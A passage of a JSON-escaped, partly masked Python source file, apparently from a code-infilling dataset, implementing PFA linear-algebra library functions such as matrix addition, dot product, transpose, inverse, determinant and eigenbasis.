range(cols)]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n rows = rowKeys(x)\n cols = colKeys(x)\n if len(rows) < 1 or len(cols) < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedMap(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n return dict((c, dict((r, x[r][c]) for r in rows)) for c in cols)\n\n\n<mask token>\n\n\nclass Inverse(LibFcn):\n name = prefix + 'inverse'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Array(P.Array(\n P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()))}], P.Map(P.Map(P\n .Double())))])\n errcodeBase = 24070\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n return matrixToArrays(arraysToMatrix(x).I)\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n rows = list(rowKeys(x))\n cols = list(colKeys(x))\n if len(rows) < 1 or len(cols) < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n xmat = mapsToMatrix(x, rows, cols)\n return matrixToMaps(xmat.I, cols, rows)\n\n\n<mask token>\n\n\nclass Trace(LibFcn):\n name = prefix + 'trace'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Double()), Sig\n ([{'x': P.Map(P.Map(P.Double()))}], P.Double())])\n errcodeBase = 24080\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows == 0:\n return 0.0\n else:\n cols = len(x[0])\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 0, self.name, pos)\n return sum(x[i][i] for i in range(min(rows, cols)))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = rowKeys(x).intersection(colKeys(x))\n return sum(x[i][i] for i in keys)\n\n\n<mask token>\n\n\nclass Det(LibFcn):\n name = prefix + 'det'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Double()), Sig\n ([{'x': P.Map(P.Map(P.Double()))}], P.Double())])\n errcodeBase = 24090\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n if rows != cols:\n raise PFARuntimeException('non-square matrix', self.\n errcodeBase + 2, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in row) for row in\n x):\n return float('nan')\n else:\n return float(np().linalg.det(arraysToMatrix(x)))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = list(rowKeys(x).union(colKeys(x)))\n if len(keys) < 1 or all(len(row) == 0 for row in list(x.values())):\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in list(row.\n values())) for row in list(x.values())):\n return float('nan')\n else:\n return float(np().linalg.det(mapsToMatrix(x, keys, keys)))\n\n\n<mask token>\n\n\nclass Symmetric(LibFcn):\n name = prefix + 'symmetric'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'tol': P.Double(\n )}], P.Boolean()), Sig([{'x': P.Map(P.Map(P.Double()))}, {'tol': P.\n Double()}], P.Boolean())])\n errcodeBase = 24100\n\n @staticmethod\n def same(x, y, tol):\n if math.isinf(x) and math.isinf(y) and (x > 0.0 and y > 0.0 or x < \n 0.0 and y < 0.0):\n return True\n elif math.isnan(x) and math.isnan(y):\n return True\n elif not math.isinf(x) and not math.isnan(x) and not math.isinf(y\n ) and not math.isnan(y):\n return abs(x - y) < tol\n else:\n return False\n\n def __call__(self, state, scope, pos, paramTypes, x, tol):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n if rows != cols:\n raise PFARuntimeException('non-square matrix', self.\n errcodeBase + 2, self.name, pos)\n return all(all(self.same(x[i][j], x[j][i], tol) for j in range(\n cols)) for i in range(rows))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = list(rowKeys(x).union(colKeys(x)))\n if len(keys) < 1 or all(len(row) == 0 for row in list(x.values())):\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n return all(all(self.same(x.get(i, {}).get(j, 0.0), x.get(j, {})\n .get(i, 0.0), tol) for j in keys) for i in keys)\n\n\n<mask token>\n\n\nclass EigenBasis(LibFcn):\n name = prefix + 'eigenBasis'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Array(P.Array(\n P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()))}], P.Map(P.Map(P\n .Double())))])\n errcodeBase = 24110\n\n def calculate(self, x, size):\n symm = (x + x.T) * 0.5\n evals, evects = np().linalg.eig(symm)\n evects = np().array(evects)\n evects2 = [(evects[:, i] * (-1.0 if evects[0, i] < 0.0 else 1.0)) for\n i in range(size)]\n eigvalm2 = [div(1.0, math.sqrt(abs(ei))) for ei in evals]\n order = np().argsort(eigvalm2)\n out = np().empty((size, size), dtype=np().double)\n for i in range(size):\n for j in range(size):\n out[i, j] = evects2[order[i]][j] * eigvalm2[order[i]]\n return out\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n if rows != cols:\n raise PFARuntimeException('non-square matrix', self.\n errcodeBase + 2, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in row) for row in\n x):\n raise PFARuntimeException('non-finite matrix', self.\n errcodeBase + 3, self.name, pos)\n return matrixToArrays(self.calculate(arraysToMatrix(x), rows))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = list(rowKeys(x).union(colKeys(x)))\n if len(keys) < 1 or all(len(z) == 0 for z in list(x.values())):\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in list(row.\n values())) for row in list(x.values())):\n raise PFARuntimeException('non-finite matrix', self.\n errcodeBase + 3, self.name, pos)\n return matrixToMaps(self.calculate(mapsToMatrix(x, keys, keys),\n len(keys)), list(map(str, range(len(keys)))), keys)\n\n\n<mask token>\n\n\nclass Truncate(LibFcn):\n name = prefix + 'truncate'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'keep': P.Int()}\n ], P.Array(P.Array(P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()\n ))}, {'keep': P.Array(P.String())}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24120\n\n def __call__(self, state, scope, pos, paramTypes, x, keep):\n if isinstance(keep, int) and keep < 0:\n keep = 0\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n return x[:keep]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n rows = rowKeys(x)\n cols = colKeys(x)\n if len(rows) < 1 or len(cols) < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n return dict((k, x[k]) for k in rows if k in keep)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef matrixToMaps(x, rows, cols):\n return dict((row, dict(list(zip(cols, xi)))) for row, xi in zip(rows, x\n .tolist()))\n\n\n<mask token>\n\n\nclass MapApply(LibFcn):\n name = prefix + 'map'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'fcn': P.Fcn([P.\n Double()], P.Double())}], P.Array(P.Array(P.Double()))), Sig([{'x':\n P.Map(P.Map(P.Double()))}, {'fcn': P.Fcn([P.Double()], P.Double())}\n ], P.Map(P.Map(P.Double())))])\n errcodeBase = 24000\n\n def __call__(self, state, scope, pos, paramTypes, x, fcn):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n return [[callfcn(state, scope, fcn, [xj]) for xj in xi] for xi in x\n ]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n return dict((i, dict((j, callfcn(state, scope, fcn, [xj])) for \n j, xj in list(xi.items()))) for i, xi in list(x.items()))\n\n\n<mask token>\n\n\nclass Scale(LibFcn):\n name = prefix + 'scale'\n sig = Sigs([Sig([{'x': P.Array(P.Double())}, {'alpha': P.Double()}], P.\n Array(P.Double())), Sig([{'x': P.Array(P.Array(P.Double()))}, {\n 'alpha': P.Double()}], P.Array(P.Array(P.Double()))), Sig([{'x': P.\n Map(P.Double())}, {'alpha': P.Double()}], P.Map(P.Double())), Sig([\n {'x': P.Map(P.Map(P.Double()))}, {'alpha': P.Double()}], P.Map(P.\n Map(P.Double())))])\n errcodeBase = 24010\n\n def __call__(self, state, scope, pos, paramTypes, x, alpha):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n return [[(xj * alpha) for xj in xi] for xi in x]\n elif isinstance(x, (list, tuple)):\n return [(xi * alpha) for xi in x]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in x):\n return dict((i, dict((j, xj * alpha) for j, xj in list(xi.items\n ()))) for i, xi in list(x.items()))\n else:\n return dict((i, xi * alpha) for i, xi in list(x.items()))\n\n\n<mask token>\n\n\nclass ZipMap(LibFcn):\n name = prefix + 'zipmap'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'y': P.Array(P.\n Array(P.Double()))}, {'fcn': P.Fcn([P.Double(), P.Double()], P.\n Double())}], P.Array(P.Array(P.Double()))), Sig([{'x': P.Map(P.Map(\n P.Double()))}, {'y': P.Map(P.Map(P.Double()))}, {'fcn': P.Fcn([P.\n Double(), P.Double()], P.Double())}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24020\n\n def __call__(self, state, scope, pos, paramTypes, x, y, fcn):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x) and isinstance(y, (list, tuple)) and all(\n isinstance(yi, (list, tuple)) for yi in y):\n if len(x) != len(y) or any(len(xi) != len(yi) for xi, yi in zip\n (x, y)):\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n return [[callfcn(state, scope, fcn, [xj, yj]) for xj, yj in zip\n (xi, yi)] for xi, yi in zip(x, y)]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())) and isinstance(y, dict) and all(isinstance(y[i],\n dict) for i in list(y.keys())):\n rows = rowKeys(x).union(rowKeys(y))\n cols = colKeys(x).union(colKeys(y))\n return dict((i, dict((j, callfcn(state, scope, fcn, [x.get(i, {\n }).get(j, 0.0), y.get(i, {}).get(j, 0.0)])) for j in cols)) for\n i in rows)\n\n\n<mask token>\n\n\nclass Add(LibFcn):\n name = prefix + 'add'\n sig = Sigs([Sig([{'x': P.Array(P.Double())}, {'y': P.Array(P.Double())}\n ], P.Array(P.Double())), Sig([{'x': P.Array(P.Array(P.Double()))},\n {'y': P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),\n Sig([{'x': P.Map(P.Double())}, {'y': P.Map(P.Double())}], P.Map(P.\n Double())), Sig([{'x': P.Map(P.Map(P.Double()))}, {'y': P.Map(P.Map\n (P.Double()))}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24030\n\n def __call__(self, state, scope, pos, paramTypes, x, y):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x) and isinstance(y, (list, tuple)) and all(\n isinstance(yi, (list, tuple)) for yi in y):\n if len(x) != len(y) or any(len(xi) != len(yi) for xi, yi in zip\n (x, y)):\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n return [[(xj + yj) for xj, yj in zip(xi, yi)] for xi, yi in zip\n (x, y)]\n elif isinstance(x, (list, tuple)) and isinstance(y, (list, tuple)):\n if len(x) != len(y):\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n return [(xi + yi) for xi, yi in zip(x, y)]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())) and isinstance(y, dict) and all(isinstance(y[i],\n dict) for i in list(y.keys())):\n rows = rowKeys(x).union(rowKeys(y))\n cols = colKeys(x).union(colKeys(y))\n return dict((i, dict((j, x.get(i, {}).get(j, 0.0) + y.get(i, {}\n ).get(j, 0.0)) for j in cols)) for i in rows)\n else:\n rows = rowKeys(x).union(rowKeys(y))\n return dict((i, x.get(i, 0.0) + y.get(i, 0.0)) for i in rows)\n\n\n<mask token>\n\n\nclass Sub(LibFcn):\n name = prefix + 'sub'\n sig = Sigs([Sig([{'x': P.Array(P.Double())}, {'y': P.Array(P.Double())}\n ], P.Array(P.Double())), Sig([{'x': P.Array(P.Array(P.Double()))},\n {'y': P.Array(P.Array(P.Double()))}], P.Array(P.Array(P.Double()))),\n Sig([{'x': P.Map(P.Double())}, {'y': P.Map(P.Double())}], P.Map(P.\n Double())), Sig([{'x': P.Map(P.Map(P.Double()))}, {'y': P.Map(P.Map\n (P.Double()))}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24040\n\n def __call__(self, state, scope, pos, paramTypes, x, y):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x) and isinstance(y, (list, tuple)) and all(\n isinstance(yi, (list, tuple)) for yi in y):\n if len(x) != len(y) or any(len(xi) != len(yi) for xi, yi in zip\n (x, y)):\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n return [[(xj - yj) for xj, yj in zip(xi, yi)] for xi, yi in zip\n (x, y)]\n elif isinstance(x, (list, tuple)) and isinstance(y, (list, tuple)):\n if len(x) != len(y):\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n return [(xi - yi) for xi, yi in zip(x, y)]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())) and isinstance(y, dict) and all(isinstance(y[i],\n dict) for i in list(y.keys())):\n rows = rowKeys(x).union(rowKeys(y))\n cols = colKeys(x).union(colKeys(y))\n return dict((i, dict((j, x.get(i, {}).get(j, 0.0) - y.get(i, {}\n ).get(j, 0.0)) for j in cols)) for i in rows)\n else:\n rows = rowKeys(x).union(rowKeys(y))\n return dict((i, x.get(i, 0.0) - y.get(i, 0.0)) for i in rows)\n\n\n<mask token>\n\n\nclass Dot(LibFcn):\n name = prefix + 'dot'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'y': P.Array(P.\n Double())}], P.Array(P.Double())), Sig([{'x': P.Map(P.Map(P.Double(\n )))}, {'y': P.Map(P.Double())}], P.Map(P.Double())), Sig([{'x': P.\n Array(P.Array(P.Double()))}, {'y': P.Array(P.Array(P.Double()))}],\n P.Array(P.Array(P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()))},\n {'y': P.Map(P.Map(P.Double()))}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24050\n\n def __call__(self, state, scope, pos, paramTypes, x, y):\n if paramTypes[1]['type'] == 'array':\n if isinstance(paramTypes[1]['items'], dict) and paramTypes[1][\n 'items']['type'] == 'array':\n bad = any(any(math.isnan(z) or math.isinf(z) for z in row) for\n row in x) or any(any(math.isnan(z) or math.isinf(z) for\n z in row) for row in y)\n xmat = arraysToMatrix(x)\n ymat = arraysToMatrix(y)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, self.name, pos)\n try:\n if bad:\n raise PFARuntimeException('contains non-finite value',\n self.errcodeBase + 2, self.name, pos)\n return matrixToArrays(np().dot(xmat, ymat))\n except ValueError:\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n else:\n bad = any(any(math.isnan(z) or math.isinf(z) for z in row) for\n row in x) or any(math.isnan(z) or math.isinf(z) for z in y)\n xmat = arraysToMatrix(x)\n ymat = arrayToRowVector(y)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, self.name, pos)\n try:\n if bad:\n raise PFARuntimeException('contains non-finite value',\n self.errcodeBase + 2, self.name, pos)\n return rowVectorToArray(np().dot(xmat, ymat))\n except ValueError:\n raise PFARuntimeException('misaligned matrices', self.\n errcodeBase + 0, self.name, pos)\n elif paramTypes[1]['type'] == 'map':\n if isinstance(paramTypes[1]['values'], dict) and paramTypes[1][\n 'values']['type'] == 'map':\n bad = any(any(math.isnan(z) or math.isinf(z) for z in list(\n row.values())) for row in list(x.values())) or any(any(\n math.isnan(z) or math.isinf(z) for z in list(row.values\n ())) for row in list(y.values()))\n rows = list(rowKeys(x))\n inter = list(colKeys(x).union(rowKeys(y)))\n cols = list(colKeys(y))\n xmat = mapsToMatrix(x, rows, inter)\n ymat = mapsToMatrix(y, inter, cols)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, self.name, pos)\n if bad:\n raise PFARuntimeException('contains non-finite value', \n self.errcodeBase + 2, self.name, pos)\n return matrixToMaps(np().dot(xmat, ymat), rows, cols)\n else:\n bad = any(any(math.isnan(z) or math.isinf(z) for z in list(\n row.values())) for row in list(x.values())) or any(math\n .isnan(z) or math.isinf(z) for z in list(y.values()))\n rows = list(rowKeys(x))\n cols = list(colKeys(x).union(rowKeys(y)))\n xmat = mapsToMatrix(x, rows, cols)\n ymat = mapToRowVector(y, cols)\n if xmat.shape[0] == 0 or xmat.shape[1] == 0 or ymat.shape[0\n ] == 0 or ymat.shape[1] == 0:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 1, self.name, pos)\n if bad:\n raise PFARuntimeException('contains non-finite value', \n self.errcodeBase + 2, self.name, pos)\n return rowVectorToMap(np().dot(xmat, ymat), rows)\n\n\n<mask token>\n\n\nclass Transpose(LibFcn):\n name = prefix + 'transpose'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Array(P.Array(\n P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()))}], P.Map(P.Map(P\n .Double())))])\n errcodeBase = 24060\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n return [[x[r][c] for r in range(rows)] for c in range(cols)]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n rows = rowKeys(x)\n cols = colKeys(x)\n if len(rows) < 1 or len(cols) < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedMap(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n return dict((c, dict((r, x[r][c]) for r in rows)) for c in cols)\n\n\n<mask token>\n\n\nclass Inverse(LibFcn):\n name = prefix + 'inverse'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Array(P.Array(\n P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()))}], P.Map(P.Map(P\n .Double())))])\n errcodeBase = 24070\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n return matrixToArrays(arraysToMatrix(x).I)\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n rows = list(rowKeys(x))\n cols = list(colKeys(x))\n if len(rows) < 1 or len(cols) < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n xmat = mapsToMatrix(x, rows, cols)\n return matrixToMaps(xmat.I, cols, rows)\n\n\n<mask token>\n\n\nclass Trace(LibFcn):\n name = prefix + 'trace'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Double()), Sig\n ([{'x': P.Map(P.Map(P.Double()))}], P.Double())])\n errcodeBase = 24080\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows == 0:\n return 0.0\n else:\n cols = len(x[0])\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 0, self.name, pos)\n return sum(x[i][i] for i in range(min(rows, cols)))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = rowKeys(x).intersection(colKeys(x))\n return sum(x[i][i] for i in keys)\n\n\n<mask token>\n\n\nclass Det(LibFcn):\n name = prefix + 'det'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Double()), Sig\n ([{'x': P.Map(P.Map(P.Double()))}], P.Double())])\n errcodeBase = 24090\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n if rows != cols:\n raise PFARuntimeException('non-square matrix', self.\n errcodeBase + 2, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in row) for row in\n x):\n return float('nan')\n else:\n return float(np().linalg.det(arraysToMatrix(x)))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = list(rowKeys(x).union(colKeys(x)))\n if len(keys) < 1 or all(len(row) == 0 for row in list(x.values())):\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in list(row.\n values())) for row in list(x.values())):\n return float('nan')\n else:\n return float(np().linalg.det(mapsToMatrix(x, keys, keys)))\n\n\n<mask token>\n\n\nclass Symmetric(LibFcn):\n name = prefix + 'symmetric'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'tol': P.Double(\n )}], P.Boolean()), Sig([{'x': P.Map(P.Map(P.Double()))}, {'tol': P.\n Double()}], P.Boolean())])\n errcodeBase = 24100\n\n @staticmethod\n def same(x, y, tol):\n if math.isinf(x) and math.isinf(y) and (x > 0.0 and y > 0.0 or x < \n 0.0 and y < 0.0):\n return True\n elif math.isnan(x) and math.isnan(y):\n return True\n elif not math.isinf(x) and not math.isnan(x) and not math.isinf(y\n ) and not math.isnan(y):\n return abs(x - y) < tol\n else:\n return False\n\n def __call__(self, state, scope, pos, paramTypes, x, tol):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n if rows != cols:\n raise PFARuntimeException('non-square matrix', self.\n errcodeBase + 2, self.name, pos)\n return all(all(self.same(x[i][j], x[j][i], tol) for j in range(\n cols)) for i in range(rows))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = list(rowKeys(x).union(colKeys(x)))\n if len(keys) < 1 or all(len(row) == 0 for row in list(x.values())):\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n return all(all(self.same(x.get(i, {}).get(j, 0.0), x.get(j, {})\n .get(i, 0.0), tol) for j in keys) for i in keys)\n\n\n<mask token>\n\n\nclass EigenBasis(LibFcn):\n name = prefix + 'eigenBasis'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}], P.Array(P.Array(\n P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()))}], P.Map(P.Map(P\n .Double())))])\n errcodeBase = 24110\n\n def calculate(self, x, size):\n symm = (x + x.T) * 0.5\n evals, evects = np().linalg.eig(symm)\n evects = np().array(evects)\n evects2 = [(evects[:, i] * (-1.0 if evects[0, i] < 0.0 else 1.0)) for\n i in range(size)]\n eigvalm2 = [div(1.0, math.sqrt(abs(ei))) for ei in evals]\n order = np().argsort(eigvalm2)\n out = np().empty((size, size), dtype=np().double)\n for i in range(size):\n for j in range(size):\n out[i, j] = evects2[order[i]][j] * eigvalm2[order[i]]\n return out\n\n def __call__(self, state, scope, pos, paramTypes, x):\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n if rows != cols:\n raise PFARuntimeException('non-square matrix', self.\n errcodeBase + 2, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in row) for row in\n x):\n raise PFARuntimeException('non-finite matrix', self.\n errcodeBase + 3, self.name, pos)\n return matrixToArrays(self.calculate(arraysToMatrix(x), rows))\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n keys = list(rowKeys(x).union(colKeys(x)))\n if len(keys) < 1 or all(len(z) == 0 for z in list(x.values())):\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if any(any(math.isnan(z) or math.isinf(z) for z in list(row.\n values())) for row in list(x.values())):\n raise PFARuntimeException('non-finite matrix', self.\n errcodeBase + 3, self.name, pos)\n return matrixToMaps(self.calculate(mapsToMatrix(x, keys, keys),\n len(keys)), list(map(str, range(len(keys)))), keys)\n\n\n<mask token>\n\n\nclass Truncate(LibFcn):\n name = prefix + 'truncate'\n sig = Sigs([Sig([{'x': P.Array(P.Array(P.Double()))}, {'keep': P.Int()}\n ], P.Array(P.Array(P.Double()))), Sig([{'x': P.Map(P.Map(P.Double()\n ))}, {'keep': P.Array(P.String())}], P.Map(P.Map(P.Double())))])\n errcodeBase = 24120\n\n def __call__(self, state, scope, pos, paramTypes, x, keep):\n if isinstance(keep, int) and keep < 0:\n keep = 0\n if isinstance(x, (list, tuple)) and all(isinstance(xi, (list, tuple\n )) for xi in x):\n rows = len(x)\n if rows < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n cols = len(x[0])\n if cols < 1:\n raise PFARuntimeException('too few rows/cols', self.\n errcodeBase + 0, self.name, pos)\n if raggedArray(x):\n raise PFARuntimeException('ragged columns', self.\n errcodeBase + 1, self.name, pos)\n return x[:keep]\n elif isinstance(x, dict) and all(isinstance(x[i], dict) for i in\n list(x.keys())):\n rows = rowKeys(x)\n cols = colKeys(x)\n if len(rows) < 1 or len(cols) 